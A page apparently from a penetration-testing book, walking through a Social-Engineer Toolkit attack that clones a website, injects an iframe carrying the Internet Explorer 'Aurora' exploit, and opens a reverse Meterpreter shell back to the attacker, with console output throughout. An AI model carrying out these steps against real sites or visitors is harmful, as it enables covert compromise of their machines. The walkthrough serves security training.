background image

The Social-Engineer Toolkit

147

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com

 Enter the url to clone: 

http://www.secmaniac.com

Select 

Website Attack Vectors

   from the SET main menu, and then 

select 

The Metasploit Browser Exploit Method

  . Then select the 

Site Cloner

   

option, and enter 

http://www.secmaniac.com

   as the website you want to use 

for cloning.

Once the site is cloned, we’ll set up the exploit to trigger when a target 

browses the site.

Enter the browser exploit you would like to use

 16. Microsoft Internet Explorer "Aurora"

Enter your choice (1-23) (enter for default): 

16

What payload do you want to generate:

Name:                                      Description:

2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send 

back to attacker.

 Enter choice (example 1-10) (Enter for default):

 

Enter the port to use for the reverse (enter for default):

[*] Cloning the website: http://www.secmaniac.com
[*] This could take a little bit...
[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.
[*] Launching MSF Listener...
[*] This may take a few to load MSF...                                                                               

resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(ms10_002_aurora) >
[*] Started reverse handler on 10.10.1.112:443
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http:// 10.10.1.112:8080/
[*] Server started.

To complete the attack setup, select the client-side exploit you wish to 

use. Above, we choose the infamous Internet Explorer Aurora exploit   and 
accept the default reverse Meterpreter payload by pressing 

ENTER

  .

When the target reaches 

http://www.secmaniac.com/

, the site looks normal, 

but his system is compromised through an 

iframe injection

. SET automatically 

rewrites the site to contain the iframe that houses the Metasploit client-side 
attack.

Back at the attacking machine, we see that the attack is successful. The 

Meterpreter session has established the connection from the target to the 
attacking machine, and we have full access to the system, as shown here.